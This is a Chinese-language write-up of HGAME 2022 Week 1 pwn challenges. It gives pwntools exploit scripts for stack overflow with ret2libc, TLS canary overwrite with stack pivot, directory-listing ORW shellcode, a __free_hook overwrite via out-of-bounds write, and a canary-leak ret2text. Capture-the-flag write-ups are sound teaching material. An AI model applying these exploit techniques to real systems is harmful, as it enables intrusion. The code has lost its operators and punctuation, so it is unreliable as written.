签名能留链接的网站,一个人看的浏览器,电商运营公司,皖icp网站建设PWN-COMPETITION-HGAME2022-Week1enter_the_pwn_landenter_the_evil_pwn_landoldfashion_orwser_per_fatest_your_nctest_your_gdbenter_the_pwn_land
栈溢出#xff0c;需要注意的是下标 i 的地址比输入s的地址更高 s溢出会覆盖 i #xff0c;于是需要小心地覆写 i 的值需要注意的是下标 i 的地址比输入s的地址更高 s溢出会覆盖 i 于是需要小心地覆写 i 的值让循环顺利执行下去 然后就是常规的ret2libc
# -*- coding:utf-8 -*-
from pwn import *
context.log_leveldebug
ioprocess(./pwn1)
#ioremote(chuj.top,30722)
elfELF(./pwn1)main_addr0x401260
puts_gotelf.got[puts]
puts_pltelf.plt[puts]
pop_rdi0x401313
ret0x40101a
payloada*44p32(44)b*8p64(pop_rdi)p64(puts_got)p64(puts_plt)p64(main_addr)
io.sendline(payload)
puts_addru64(io.recvuntil(\x7f)[-6:].ljust(8,\x00))
print(puts_addrhex(puts_addr))
libc_baseputs_addr-0x0875a0
systemlibc_base0x055410
binshlibc_base0x1b75aapayloada*44p32(44)b*8p64(pop_rdi)p64(binsh)p64(ret)p64(system)p64(main_addr)
io.sendline(payload)io.interactive()enter_the_evil_pwn_land
栈溢出开了canary保护 不能通过覆盖canary低字节为0x0A从而puts出canary test_thread返回时检测到canary不正确程序就会crash test_thread是新创建的线程而且栈可溢出的字节数很多考虑直接覆写TLS中的canary 关键是确定TLS中canary的偏移参考canary的各种姿势 通过爆破确定本题的TLS中canary的偏移为2160 然后是通过栈迁移实现ret2one_gadget
# -*- coding:utf-8 -*-
from pwn import *
context.log_leveldebug
ioprocess(./enter_the_evil_pwn_land)
#ioremote(chuj.top,39853)
elfELF(./enter_the_evil_pwn_land)
libcELF(./libc-2.31.so)buf0x404060
offset2160
main_addr0x4011D6
leave_ret0x40125A
puts_gotelf.got[puts]
puts_pltelf.plt[puts]
read_pltelf.plt[read]
pop_rdi0x401363
pop_rsi_r150x401361
ret0x40101a
payloada*48p64(buf)p64(pop_rdi)p64(puts_got)p64(puts_plt)
payloadp64(pop_rdi)p64(0)p64(pop_rsi_r15)p64(buf)p64(0)p64(read_plt)p64(leave_ret)
payloadpayload.ljust(offset,a)
io.sendline(payload)
puts_addru64(io.recvuntil(\x7f)[-6:].ljust(8,\x00))
print(puts_addrhex(puts_addr))
libc_baseputs_addr-libc.sym[puts]
print(libc_basehex(libc_base))pop_rdx_r12_ret libc_base0x11c371
ogglibc_base0xe6c7epayloada*8p64(pop_rdx_r12_ret)p64(0)p64(0)p64(ogg)
io.sendline(payload)io.interactive()oldfashion_orw
-1绕过atoi然后栈溢出泄露libc基址 按照题目描述和hint知道要读目录 读目录对应的系统调用为__NR_getdents系统调用号为78 参考getdents - 获得目录项 遍历目录找文件名前4个字符为flag的文件然后orw打印flag 读目录遍历目录和orw没有很合适的gadgets故直接写成shellcode 于是要先mmap出一块可执行的内存 exp如下
# -*- coding:utf-8 -*-
from pwn import *
from pwnlib.rop import *
from pwnlib.context import *
from pwnlib.fmtstr import *
from pwnlib.util.packing import *
from pwnlib.gdb import *context.log_leveldebug
context.archamd64
context.oslinux#ioprocess(./vuln)
ioremote(chuj.top,43565)
elfELF(./vuln)
libcELF(./libc-2.31.so)#gdb.attach(io,b * 0x4013DB)
#pause()ropROP(elf)
rop.write(1,elf.got[write])
for i in range(0x90//6):rop.read(0,elf.bss(i*6))
rop.migrate(elf.bss())io.sendlineafter(size?\n,-1)
io.sendafter(content?\n,\x00*0x38rop.chain())
io.recvuntil(done!\n)
libc_baseu64(io.recv(6).ljust(8,\x00))-libc.sym[write]
libc.addresslibc_basestring_./\x00
shellcodeasm(mov rsi,0x10000mov rdi,0x600000mov rax,2syscallmov rdx,0xf00mov rsi,0x600100mov rdi,raxmov rax,0x4esyscallmov r8,raxadd r8,0x600100mov r9,0x600100start:mov edx,dword ptr[r90x12]cmp edx,0x67616c66je printxor rcx,rcxmov cx,word ptr[r90x10]add r9,rcxcmp r9,r8jl startjmp endprint:xor rsi,rsimov rdi,r9add rdi,0x12mov rax,2syscallmov rdx,0x100mov rsi,0x600200mov rdi,raxmov rax,0syscallmov rdx,raxmov rsi,0x600200mov rdi,1mov rax,1syscallend:jmp $)rop2ROP(libc)
rop2.mmap(0x600000,0x1000,7,0x21)
rop2.read(0,0x600000,len(shellcode)len(string_))
rop2.call(0x600000len(string_))
io.send(rop2.chain())
sleep(1)
io.send(string_shellcode)#pause()io.interactive()ser_per_fa
程序实现了一个spfa算法题目提示漏洞点不在spfa算法内于是分析其他地方 main函数中第33、34行可以给v6输入一个负数实现任意读泄露程序基址和libc基址 add函数中当写入很多组数据时num_edge也会被覆写 覆写num_edge为合适的值实现任意写 spfa函数中第36行删除队列会调用free 于是配合上面的任意写将free_hook写成后门函数地址即可getshell
# -*- coding:utf-8 -*-
from pwn import *
import hashlib
context.log_leveldebug
ioprocess(./spfa)
#ioremote(chuj.top,49375)
elfELF(./spfa)
libcELF(./libc-2.31.so)def get_pwd(str, num):if(num 1):for x in str:yield xelse:for x in str:for y in get_pwd(str, num-1):yield xystrKey
for i in range(33,127):strKeychr(i)#io.recvuntil(sha256(????) )
#codeio.recvuntil(\n)[:-1]
#for x in get_pwd(strKey,4):
# hhashlib.sha256()
# h.update(x.encode(encodingutf-8))
# h_hexdigesth.hexdigest()
# if h_hexdigestcode:
# io.sendline(x)
# breakio.sendlineafter(datas?\n ,3)#1,泄露程序基址
num1
io.sendlineafter(nodes?\n ,str(num))
io.sendlineafter(edges?\n ,str(num))
for i in range(num):io.sendline(1 2 3)io.sendlineafter(which node?\n ,1)
__frame_dummy_init_array_entry(elf.sym[__frame_dummy_init_array_entry]-elf.sym[dist])//8
io.sendlineafter(to ?\n ,str(__frame_dummy_init_array_entry))
io.recvuntil(shortest path is )
proc_baseint(io.recvuntil(\n)[:-1])-elf.sym[frame_dummy]
print(proc_basehex(proc_base))
backdoorproc_base0x16A5
print(backdoorhex(backdoor))
unk_7068_addrproc_base0x7068
print(unk_7068_addrhex(unk_7068_addr))#2,泄漏libc基址
num1
io.sendlineafter(nodes?\n ,str(num))
io.sendlineafter(edges?\n ,str(num))
for i in range(num):io.sendline(1 2 3)io.sendlineafter(which node?\n ,1)
stdout(elf.bss()-elf.sym[dist])//8
io.sendlineafter(to ?\n ,str(stdout))
io.recvuntil(shortest path is )
_IO_2_1_stdout_int(io.recvuntil(\n)[:-1])
print(_IO_2_1_stdout_hex(_IO_2_1_stdout_))
libc_base_IO_2_1_stdout_-libc.sym[_IO_2_1_stdout_]
print(libc_basehex(libc_base))
free_hook_addrlibc_baselibc.sym[__free_hook]
print(free_hook_addrhex(free_hook_addr))#3,覆写free_hook为后门函数
free_hook_to_unk_7068_offset(free_hook_addr-unk_7068_addr)//24
print(free_hook_to_edge_offsethex(free_hook_to_unk_7068_offset))
num609
io.sendlineafter(nodes?\n ,str(num1))
io.sendlineafter(edges?\n ,str(num1))
send_contentstr(1) str(num1) str(free_hook_to_unk_7068_offset-1)
for i in range(num):io.sendline(send_content)send_contentstr(1) str(backdoor) str(backdoor)
io.sendline(send_content)io.sendlineafter(which node?\n ,2)io.sendline(cat flag)io.interactive()test_your_nc
nc连上去cat flag即可
test_your_gdb
调试得到s2的16字节数据第23行的write泄露canary第24行的gets造成栈溢出 程序有后门函数ret2text即可
# -*- coding:utf-8 -*-
from pwn import *
context.log_leveldebug
ioprocess(./test_your_gdb)
#ioremote(chuj.top,50610)
elfELF(./test_your_gdb)backdoor0x401256
ans10xb0361e0e8294f147
ans20x8c09e0c34ed8a6a9
io.sendafter(pass word\n,p64(ans1)p64(ans2))io.recv(24)
canaryu64(io.recv(8))
print(canaryhex(canary))payloada*24p64(canary)b*8p64(backdoor)
io.sendline(payload)io.interactive()
